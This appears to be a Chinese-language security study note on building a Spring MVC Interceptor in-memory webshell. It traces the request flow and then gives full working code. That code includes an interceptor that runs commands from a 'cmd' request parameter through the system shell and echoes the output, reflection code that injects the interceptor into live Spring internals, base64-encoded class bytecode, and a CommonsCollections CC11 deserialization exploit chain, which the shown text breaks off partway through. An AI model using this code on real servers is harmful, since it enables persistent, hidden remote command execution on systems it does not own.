前言

随着微服务部署技术的迭代演进,大型业务系统在到达真正的应用服务器的时候,会经过一些系列的网关,复杂均衡,防火墙。所以如果你新建的shell路由不在这些网关的白名单中,那么就很有可能无法访问到,在到达应用服务器之前就会被丢弃,我们该如何解决这个问题?

所以,在注入内存马的时候,就尽量不要用新建的路由,或者shell地址。最好是在访问正常的业务地址之前,就能执行我们的代码。

流程分析

我们先在org.apache.catalina.core.ApplicationFilterChain中的 internalDoFilter方法中打断点

Java内存马学习笔记-Interceptor - 图1

可以查看到执行流程

Java内存马学习笔记-Interceptor - 图2

看起来和我们之前调试的Tomcat很像。

但是这里不同的是在经过 Filter 层面处理后,就会进入熟悉的 spring-webmvc 组件 org.springframework.web.servlet.DispatcherServlet 类的 doDispatch 方法中。

Java内存马学习笔记-Interceptor - 图3

跟进这个方法,这里调用了getHandler,继续跟进

Java内存马学习笔记-Interceptor - 图4

可以看到是遍历this.handlerMappings 这个迭代器中的mappergetHandler 方法处理Http中的request请求。

继续追踪,最终会调用到org.springframework.web.servlet.handler.AbstractHandlerMapping 类的 getHandler 方法,并通过 getHandlerExecutionChain(handler, request) 方法返回 HandlerExecutionChain 类的实例。

Java内存马学习笔记-Interceptor - 图5

跟进getHandlerExecutionChain

Java内存马学习笔记-Interceptor - 图6

发现会遍历 this.adaptedInterceptors 对象里所有的 HandlerInterceptor 类实例,通过 chain.addInterceptor 把已有的所有拦截器加入到需要返回的 HandlerExecutionChain 类实例中。以上就是添加拦截器(interceptor)。

接下来看看在哪里调用。继续往下跟

Java内存马学习笔记-Interceptor - 图7

Java内存马学习笔记-Interceptor - 图8

跟进之后发现interceptor.preHandle(request, response, this.handler) 会遍历拦截器,并执行其preHandle方法。

Java内存马学习笔记-Interceptor - 图9

如果程序提前在调用的 Controller 上设置了 Aspect(切面),那么在正式调用 Controller 前实际上会先调用切面的代码,一定程度上也起到了 “拦截” 的效果。

那么总结一下,一个 request 发送到 spring 应用,大概会经过以下几个层面才会到达处理业务逻辑的 Controller 层:

  1. HttpRequest --> Filter --> DispactherServlet --> Interceptor --> Aspect --> Controller

攻击构造

Interceptor 来拦截所有进入 Controller 的 http 请求理论上是可行的,接下来就是实现从代码层面动态注入一个 Interceptor 来达到 webshell 的效果。

实现恶意Interceptor

首先,我写了一个继承自 org.springframework.web.servlet.handler.HandlerInterceptorAdapter 类,名为 VulInterceptor 的拦截器,并重写了 preHandle 方法,在其中实现一个简单的命令执行回显的 webshell 逻辑。

  1. import org.springframework.web.servlet.HandlerInterceptor;
  2. import org.springframework.web.servlet.ModelAndView;
  4. import javax.servlet.http.HttpServletRequest;
  5. import javax.servlet.http.HttpServletResponse;
  6. import java.io.BufferedReader;
  7. import java.io.InputStreamReader;
  8. import java.io.PrintWriter;
  10. public class VulInterceptor implements HandlerInterceptor {
  11.     @Override
  12.     public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
  13.         try {
  14.             String arg0 = request.getParameter("cmd");
  15.             PrintWriter writer = response.getWriter();
  16.             if (arg0 != null) {
  17.                 String o = "";
  18.                 java.lang.ProcessBuilder p;
  19.                 if(System.getProperty("os.name").toLowerCase().contains("win")){
  20.                     p = new java.lang.ProcessBuilder(new String[]{"cmd.exe", "/c", arg0});
  21.                 }else{
  22.                     p = new java.lang.ProcessBuilder(new String[]{"/bin/sh", "-c", arg0});
  23.                 }
  24.                 java.util.Scanner c = new java.util.Scanner(p.start().getInputStream()).useDelimiter("\\A");
  25.                 o = c.hasNext() ? c.next(): o;
  26.                 c.close();
  27.                 writer.write(o);
  28.                 writer.flush();
  29.                 writer.close();
  30.             }else{
  31.                 //当请求没有携带指定的参数(code)时,返回 404 错误
  32.                 response.sendError(404);
  33.             }
  34.         }catch (Exception e){}
  35.         return true;
  36.     }
  38.     @Override
  39.     public void postHandle(HttpServletRequest request, HttpServletResponse response, Object handler, ModelAndView modelAndView) throws Exception {
  40.         HandlerInterceptor.super.postHandle(request, response, handler, modelAndView);
  41.     }
  43.     @Override
  44.     public void afterCompletion(HttpServletRequest request, HttpServletResponse response, Object handler, Exception ex) throws Exception {
  45.         HandlerInterceptor.super.afterCompletion(request, response, handler, ex);
  46.     }
  47. }

获取 ApplicationContext

然后,根据前面的详细分析,我选择把上面的 VulInterceptor 类实例手动注入到 org.springframework.web.servlet.handler.AbstractHandlerMapping 类的 adaptedInterceptors 属性中。

这里就遇到了个问题,怎么拿到当前代码运行环境中原来的 adaptedInterceptors 属性值呢?这里可以从当前代码运行时的上下文环境 ApplicationContext 中去寻找。

且网上都有的四种获得ApplicationContext实例,这里随便选用一种。

获取adaptedInterceptors 属性值

获得 ApplicationContext 实例后,还需要知道 org.springframework.web.servlet.handler.AbstractHandlerMapping 类实例的 bean name 叫什么。

bean 实例名字是 requestMappingHandlerMapping 或者比较老版本的 DefaultAnnotationHandlerMapping

  1. org.springframework.web.servlet.handler.AbstractHandlerMapping abstractHandlerMapping = (org.springframework.web.servlet.handler.AbstractHandlerMapping)context.getBean("requestMappingHandlerMapping");
  2. java.lang.reflect.Field field = org.springframework.web.servlet.handler.AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
  3. field.setAccessible(true);
  4. java.util.ArrayList<Object> adaptedInterceptors = (java.util.ArrayList<Object>)field.get(abstractHandlerMapping);

注入Interceptor

万事俱备,最后只要把第一步实现的恶意 Interceptor 类加入到 adaptedInterceptors 属性值中就可以了。

这里顺便讲个小技巧,可以把 VulInterceptor 类在当前线程上下文的 ClassLoader 中定义,然后再从其中取出来就可以获得类实例了。

  1. String className = "VulInterceptor";
  2. String b64 = "......"; // VulInterceptor 类 class 的 base64 编码
  3. byte[] bytes = sun.misc.BASE64Decoder.class.newInstance().decodeBuffer(b64);
  4. java.lang.ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
  5. try {
  6.     classLoader.loadClass(className);
  7. }catch (ClassNotFoundException e){
  8.   java.lang.reflect.Method m0 = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
  9.   m0.setAccessible(true);
  10.   m0.invoke(classLoader, className, bytes, 0, bytes.length);
  11.   adaptedInterceptors.add(classLoader.loadClass("magicInterceptor").newInstance());
  12. }

所以内存马:

  1. import org.springframework.web.context.WebApplicationContext;
  2. import org.springframework.web.context.request.RequestContextHolder;
  3. import org.springframework.web.context.request.ServletRequestAttributes;
  4. import org.springframework.web.servlet.handler.AbstractHandlerMethodMapping;
  5. import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition;
  6. import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
  7. import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
  8. import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
  10. import javax.servlet.http.HttpServletRequest;
  11. import javax.servlet.http.HttpServletResponse;
  12. import java.io.IOException;
  13. import java.lang.reflect.InvocationTargetException;
  14. import java.lang.reflect.Method;
  15. import java.nio.file.Files;
  16. import java.nio.file.Paths;
  18. public class Evil {
  19.     public Evil() throws Exception{
  20.         //获得context
  21.         WebApplicationContext context = (WebApplicationContext)RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
  22.         //获取 adaptedInterceptors 属性值
  23.         org.springframework.web.servlet.handler.AbstractHandlerMapping abstractHandlerMapping = (org.springframework.web.servlet.handler.AbstractHandlerMapping)context.getBean("requestMappingHandlerMapping");
  24.         java.lang.reflect.Field field = org.springframework.web.servlet.handler.AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
  25.         field.setAccessible(true);
  26.         java.util.ArrayList<Object> adaptedInterceptors = (java.util.ArrayList<Object>)field.get(abstractHandlerMapping);
  27.         //注入 Interceptor
  28.         String className = "VulInterceptor";
  29.         String b64 = "yv66vgAAADQAlgoAIwBPCABQCwBRAFILAFMAVAgAVQgAVgoAVwBYCgAMAFkIAFoKAAwAWwcAXAcAXQgAXggAXwoACwBgCABhCABiBwBjCgALAGQKAGUAZgoAEgBnCABoCgASAGkKABIAagoAEgBrCgASAGwKAG0AbgoAbQBvCgBtAGwLAFMAcAcAcQsAJAByCwAkAHMHAHQHAHUHAHYBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExWdWxJbnRlcmNlcHRvcjsBAAlwcmVIYW5kbGUBAGQoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlO0xqYXZhL2xhbmcvT2JqZWN0OylaAQABcAEAGkxqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXI7AQABbwEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAAWMBABNMamF2YS91dGlsL1NjYW5uZXI7AQAEYXJnMAEABndyaXRlcgEAFUxqYXZhL2lvL1ByaW50V3JpdGVyOwEAB3JlcXVlc3QBACdMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBAAhyZXNwb25zZQEAKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTsBAAdoYW5kbGVyAQASTGphdmEvbGFuZy9PYmplY3Q7AQANU3RhY2tNYXBUYWJsZQcAXQcAdwcAXAcAYwcAcQEACkV4Y2VwdGlvbnMBABBNZXRob2RQYXJhbWV0ZXJzAQAKcG9zdEhhbmRsZQEAkihMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7TGphdmEvbGFuZy9PYmplY3Q7TG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvTW9kZWxBbmRWaWV3OylWAQAMbW9kZWxBbmRWaWV3AQAuTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvTW9kZWxBbmRWaWV3OwEAD2FmdGVyQ29tcGxldGlvbgEAeShMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7TGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9FeGNlcHRpb247KVYBAAJleAEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEAClNvdXJjZUZpbGUBABNWdWxJbnRlcmNlcHRvci5qYXZhDAAlACYBAANjbWQHAHgMAHkAegcAewwAfAB9AQAAAQAHb3MubmFtZQcAfgwAfwB6DACAAIEBAAN3aW4MAIIAgwEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgEAEGphdmEvbGFuZy9TdHJpbmcBAAdjbWQuZXhlAQACL2MMACUAhAEABy9iaW4vc2gBAAItYwEAEWphdmEvdXRpbC9TY2FubmVyDACFAIYHAIcMAIgAiQwAJQCKAQACXEEMAIsAjAwAjQCODACPAIEMAJAAJgcAdwwAkQCSDACTACYMAJQAlQEAE2phdmEvbGFuZy9FeGNlcHRpb24MAEUARgwASQBKAQAOVnVsSW50ZXJjZXB0b3IBABBqYXZhL2xhbmcvT2JqZWN0AQAyb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9IYW5kbGVySW50ZXJjZXB0b3IBABNqYXZhL2lvL1ByaW50V3JpdGVyAQAlamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdAEADGdldFBhcmFtZXRlcgEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAmamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2UBAAlnZXRXcml0ZXIBABcoKUxqYXZhL2lvL1ByaW50V3JpdGVyOwEAEGphdmEvbGFuZy9TeXN0ZW0BAAtnZXRQcm9wZXJ0eQEAC3RvTG93ZXJDYXNlAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAhjb250YWlucwEAGyhMamF2YS9sYW5nL0NoYXJTZXF1ZW5jZTspWgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAAVzdGFydAEAFSgpTGphdmEvbGFuZy9Qcm9jZXNzOwEAEWphdmEvbGFuZy9Qcm9jZXNzAQAOZ2V0SW5wdXRTdHJlYW0BABcoKUxqYXZhL2lvL0lucHV0U3RyZWFtOwEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgEADHVzZURlbGltaXRlcgEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvdXRpbC9TY2FubmVyOwEAB2hhc05leHQBAAMoKVoBAARuZXh0AQAFY2xvc2UBAAV3cml0ZQEAFShMamF2YS9sYW5nL1N0cmluZzspVgEABWZsdXNoAQAJc2VuZEVycm9yAQAEKEkpVgAhACIAIwABACQAAAAEAAEAJQAmAAEAJwAAAC8AAQABAAAABSq3AAGxAAAAAgAoAAAABgABAAAACgApAAAADAABAAAABQAqACsAAAABACwALQADACcAAAG0AAYACQAAALkrEgK5AAMCADoELLkABAEAOgUZBMYAlRIFOgYSBrgAB7YACBIJtgAKmQAiuwALWQa9AAxZAxINU1kEEg5TWQUZBFO3AA86B6cAH7sAC1kGvQAMWQMSEFNZBBIRU1kFGQRTtwAPOge7ABJZGQe2ABO2ABS3ABUSFrYAFzoIGQi2ABiZAAsZCLYAGacABRkGOgYZCLYAGhkFGQa2ABsZBbYAHBkFtgAdpwAMLBEBlLkAHgIApwAFOgQErAABAAAAsgC1AB8AAwAoAAAARgARAAAADgAKAA8AEgAQABcAEQAbABMAKwAUAEoAFgBmABgAfAAZAJAAGgCVABsAnAAcAKEAHQCmAB4AqQAgALIAIgC3ACMAKQAAAGYACgBHAAMALgAvAAcAGwCLADAAMQAGAGYAQAAuAC8ABwB8ACoAMgAzAAgACgCoADQAMQAEABIAoAA1ADYABQAAALkAKgArAAAAAAC5ADcAOAABAAAAuQA5ADoAAgAAALkAOwA8AAMAPQAAACkACP4ASgcAPgcAPwcAPvwAGwcAQPwAJQcAQUEHAD74ABr5AAhCBwBCAQBDAAAABAABAB8ARAAAAA0DADcAAAA5AAAAOwAAAAEARQBGAAMAJwAAAGAABQAFAAAACiorLC0ZBLcAILEAAAACACgAAAAKAAIAAAAoAAkAKQApAAAANAAFAAAACgAqACsAAAAAAAoANwA4AAEAAAAKADkAOgACAAAACgA7ADwAAwAAAAoARwBIAAQAQwAAAAQAAQAfAEQAAAARBAA3AAAAOQAAADsAAABHAAAAAQBJAEoAAwAnAAAAYAAFAAUAAAAKKissLRkEtwAhsQAAAAIAKAAAAAoAAgAAAC0ACQAuACkAAAA0AAUAAAAKACoAKwAAAAAACgA3ADgAAQAAAAoAOQA6AAIAAAAKADsAPAADAAAACgBLAEwABABDAAAABAABAB8ARAAAABEEADcAAAA5AAAAOwAAAEsAAAABAE0AAAACAE4="; // magicInterceptor 类 class 的 base64 编码
  30.         byte[] bytes = sun.misc.BASE64Decoder.class.newInstance().decodeBuffer(b64);
  31.         java.lang.ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
  32.         try {
  33.             classLoader.loadClass(className);
  34.         }catch (ClassNotFoundException e){
  35.             java.lang.reflect.Method m0 = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
  36.             m0.setAccessible(true);
  37.             m0.invoke(classLoader, className, bytes, 0, bytes.length);
  38.             adaptedInterceptors.add(classLoader.loadClass("VulInterceptor").newInstance());
  39.         }
  40.     }
  41. }

然后我们还是用我们上篇文章的环境打一下。

依然要记得给exp加一个父类为AbstractTranslet。

exp

  1. import com.sun.org.apache.xalan.internal.xsltc.DOM;
  2. import com.sun.org.apache.xalan.internal.xsltc.TransletException;
  3. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
  4. import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
  5. import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
  6. import org.springframework.web.context.WebApplicationContext;
  7. import org.springframework.web.context.request.RequestContextHolder;
  9. public class Evil extends AbstractTranslet {
  10.     public Evil() throws Exception{
  11.         //获得context
  12.         WebApplicationContext context = (WebApplicationContext)RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
  13.         //获取 adaptedInterceptors 属性值
  14.         org.springframework.web.servlet.handler.AbstractHandlerMapping abstractHandlerMapping = (org.springframework.web.servlet.handler.AbstractHandlerMapping)context.getBean("requestMappingHandlerMapping");
  15.         java.lang.reflect.Field field = org.springframework.web.servlet.handler.AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
  16.         field.setAccessible(true);
  17.         java.util.ArrayList<Object> adaptedInterceptors = (java.util.ArrayList<Object>)field.get(abstractHandlerMapping);
  18.         //注入 Interceptor
  19.         String className = "VulInterceptor";
  20.         String b64 = "yv66vgAAADQAiAoAIABHCAA4CwBIAEkLAEoASwgATAgATQoATgBPCgAMAFAIAFEKAAwAUgcAUwcAVAgAVQgAVgoACwBXCABYCABZBwBaCgALAFsKAFwAXQoAEgBeCABfCgASAGAKABIAYQoAEgBiCgASAGMKAGQAZQoAZABmCgBkAGMHAGcHAGgHAGkBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExWdWxJbnRlcmNlcHRvcjsBAAlwcmVIYW5kbGUBAGQoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlO0xqYXZhL2xhbmcvT2JqZWN0OylaAQABcAEAGkxqYXZhL2xhbmcvUHJvY2Vzc0J1aWxkZXI7AQAGd3JpdGVyAQAVTGphdmEvaW8vUHJpbnRXcml0ZXI7AQABbwEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAAWMBABNMamF2YS91dGlsL1NjYW5uZXI7AQAHcmVxdWVzdAEAJ0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OwEACHJlc3BvbnNlAQAoTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlOwEAB2hhbmRsZXIBABJMamF2YS9sYW5nL09iamVjdDsBAARjb2RlAQANU3RhY2tNYXBUYWJsZQcAVAcAagcAUwcAWgcAaAcAawcAbAcAbQcAZwEACkV4Y2VwdGlvbnMBABBNZXRob2RQYXJhbWV0ZXJzAQAKU291cmNlRmlsZQEAE1Z1bEludGVyY2VwdG9yLmphdmEMACEAIgcAawwAbgBvBwBsDABwAHEBAAABAAdvcy5uYW1lBwByDABzAG8MAHQAdQEAA3dpbgwAdgB3AQAYamF2YS9sYW5nL1Byb2Nlc3NCdWlsZGVyAQAQamF2YS9sYW5nL1N0cmluZwEAB2NtZC5leGUBAAIvYwwAIQB4AQAHL2Jpbi9zaAEAAi1jAQARamF2YS91dGlsL1NjYW5uZXIMAHkAegcAewwAfAB9DAAhAH4BAAJcQQwAfwCADACBAIIMAIMAdQwAhAAiBwBqDACFAIYMAIcAIgEAE2phdmEvbGFuZy9FeGNlcHRpb24BAA5WdWxJbnRlcmNlcHRvcgEAQW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvaGFuZGxlci9IYW5kbGVySW50ZXJjZXB0b3JBZGFwdGVyAQATamF2YS9pby9QcmludFdyaXRlcgEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QBACZqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZQEAEGphdmEvbGFuZy9PYmplY3QBAAxnZXRQYXJhbWV0ZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQALdG9Mb3dlckNhc2UBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQAMdXNlRGVsaW1pdGVyAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS91dGlsL1NjYW5uZXI7AQAHaGFzTmV4dAEAAygpWgEABG5leHQBAAVjbG9zZQEABXdyaXRlAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAFZmx1c2gAIQAfACAAAAAAAAIAAQAhACIAAQAjAAAALwABAAEAAAAFKrcAAbEAAAACACQAAAAGAAEAAAAFACUAAAAMAAEAAAAFACYAJwAAAAEAKAApAAMAIwAAAboABgAJAAAArysSArkAAwIAOgQZBMYAoSy5AAQBADoFEgU6BhIGuAAHtgAIEgm2AAqZACK7AAtZBr0ADFkDEg1TWQQSDlNZBRkEU7cADzoHpwAfuwALWQa9AAxZAxIQU1kEEhFTWQUZBFO3AA86B7sAElkZB7YAE7YAFLcAFRIWtgAXOggZCLYAGJkACxkItgAZpwAFGQY6BhkItgAaGQUZBrYAGxkFtgAcGQW2AB2nAAU6BQOsBKwAAQAPAKYAqQAeAAMAJAAAAEYAEQAAAAgACgAJAA8ACwAXAAwAGwAOACsADwBKABEAZgATAHwAFACQABUAlQAWAJwAFwChABgApgAaAKkAGQCrABsArQAdACUAAABmAAoARwADACoAKwAHABcAjwAsAC0ABQAbAIsALgAvAAYAZgBAACoAKwAHAHwAKgAwADEACAAAAK8AJgAnAAAAAACvADIAMwABAAAArwA0ADUAAgAAAK8ANgA3AAMACgClADgALwAEADkAAAA5AAf+AEoHADoHADsHADr8ABsHADz8ACUHAD1BBwA6/wAaAAUHAD4HAD8HAEAHAEEHADoAAQcAQgEBAEMAAAAEAAEAHgBEAAAADQMAMgAAADQAAAA2AAAAAQBFAAAAAgBG";
  21.         byte[] bytes = sun.misc.BASE64Decoder.class.newInstance().decodeBuffer(b64);
  22.         java.lang.ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
  23.         java.lang.reflect.Method m0 = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
  24.         m0.setAccessible(true);
  25.         m0.invoke(classLoader, className, bytes, 0, bytes.length);
  26.         adaptedInterceptors.add(classLoader.loadClass("VulInterceptor").newInstance());
  27.     }
  29.     @Override
  30.     public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
  32.     }
  34.     @Override
  35.     public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
  37.     }
  39. }

编译,进行base64填入cc11链中。

cc11链

  1. import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
  2. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
  3. import javassist.ClassClassPath;
  4. import javassist.ClassPool;
  5. import javassist.CtClass;
  6. import org.apache.commons.collections.functors.InvokerTransformer;
  7. import org.apache.commons.collections.keyvalue.TiedMapEntry;
  8. import org.apache.commons.collections.map.LazyMap;
  10. import java.io.*;
  11. import java.lang.reflect.Constructor;
  12. import java.lang.reflect.Field;
  13. import java.util.Base64;
  14. import java.util.HashMap;
  15. import java.util.HashSet;
  17. @SuppressWarnings("all")
  18. public class CC11 {
  19.     public static void main(String[] args) throws Exception {
  21.         // 利用javasist动态创建恶意字节码
  23.         byte[] classBytes = Base64.getDecoder().decode("yv66vgAAADQAnQoAIwBPCgBQAFEIAFILAFMAVAcAVQgAVgsABQBXBwBYCAAxCgAXAFkKAFoAWwoAWgBcBwBdCABeCABfBwBgCgAXAGEKABAAYgoAYwBkCgBjAGUHAGYIAGcHAGgHAGkHADcJAGoAawoAFwBsCgBtAFsHAG4KAGoAbwoAbQBwCgAVAHEKAA0AcgcAcwcAdAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAGTEV2aWw7AQAHY29udGV4dAEAN0xvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L1dlYkFwcGxpY2F0aW9uQ29udGV4dDsBABZhYnN0cmFjdEhhbmRsZXJNYXBwaW5nAQBATG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvaGFuZGxlci9BYnN0cmFjdEhhbmRsZXJNYXBwaW5nOwEABWZpZWxkAQAZTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEAE2FkYXB0ZWRJbnRlcmNlcHRvcnMBABVMamF2YS91dGlsL0FycmF5TGlzdDsBAAljbGFzc05hbWUBABJMamF2YS9sYW5nL1N0cmluZzsBAANiNjQBAAVieXRlcwEAAltCAQALY2xhc3NMb2FkZXIBABdMamF2YS9sYW5nL0NsYXNzTG9hZGVyOwEAAm0wAQAaTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABZMb2NhbFZhcmlhYmxlVHlwZVRhYmxlAQApTGphdmEvdXRpbC9BcnJheUxpc3Q8TGphdmEvbGFuZy9PYmplY3Q7PjsBAApFeGNlcHRpb25zBwB1AQAJdHJhbnNmb3JtAQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwcAdgEAEE1ldGhvZFBhcmFtZXRlcnMBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEAClNvdXJjZUZpbGUBAAlFdmlsLmphdmEMACQAJQcAdwwAeAB5AQA5b3JnLnNwcmluZ2ZyYW1ld29yay53ZWIuc2VydmxldC5EaXNwYXRjaGVyU2VydmxldC5DT05URVhUBwB6DAB7AHwBADVvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L1dlYkFwcGxpY2F0aW9uQ29udGV4dAEAHHJlcXVlc3RNYXBwaW5nSGFuZGxlck1hcHBpbmcMAH0AfgEAPm9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL3NlcnZsZXQvaGFuZGxlci9BYnN0cmFjdEhhbmRsZXJNYXBwaW5nDAB/AIAHAIEMAIIAgwwAhACFAQATamF2YS91dGlsL0FycmF5TGlzdAEADlZ1bEludGVyY2VwdG9yAQt8eXY2NnZnQUFBRFFBaUFvQUlBQkhDQUE0Q3dCSUFFa0xBRW9BU3dnQVRBZ0FUUW9BVGdCUENnQU1BRkFJQUZFS0FBd0FVZ2NBVXdjQVZBZ0FWUWdBVmdvQUN3QlhDQUJZQ0FCWkJ3QmFDZ0FMQUZzS0FGd0FYUW9BRWdCZUNBQmZDZ0FTQUdBS0FCSUFZUW9BRWdCaUNnQVNBR01LQUdRQVpRb0FaQUJtQ2dCa0FHTUhBR2NIQUdnSEFHa0JBQVk4YVc1cGRENEJBQU1vS1ZZQkFBUkRiMlJsQVFBUFRHbHVaVTUxYldKbGNsUmhZbXhsQVFBU1RHOWpZV3hXWVhKcFlXSnNaVlJoWW14bEFRQUVkR2hwY3dFQUVFeFdkV3hKYm5SbGNtTmxjSFJ2Y2pzQkFBbHdjbVZJWVc1a2JHVUJBR1FvVEdwaGRtRjRMM05sY25ac1pYUXZhSFIwY0M5SWRIUndVMlZ5ZG14bGRGSmxjWFZsYzNRN1RHcGhkbUY0TDNObGNuWnNaWFF2YUhSMGNDOUlkSFJ3VTJWeWRteGxkRkpsYzNCdmJuTmxPMHhxWVhaaEwyeGhibWN2VDJKcVpXTjBPeWxhQVFBQmNBRUFHa3hxWVhaaEwyeGhibWN2VUhKdlkyVnpjMEoxYVd4a1pYSTdBUUFHZDNKcGRHVnlBUUFWVEdwaGRtRXZhVzh2VUhKcGJuUlhjbWwwWlhJN0FRQUJid0VBRWt4cVlYWmhMMnhoYm1jdlUzUnlhVzVuT3dFQUFXTUJBQk5NYW1GMllTOTFkR2xzTDFOallXNXVaWEk3QVFBSGNtVnhkV1Z6ZEFFQUoweHF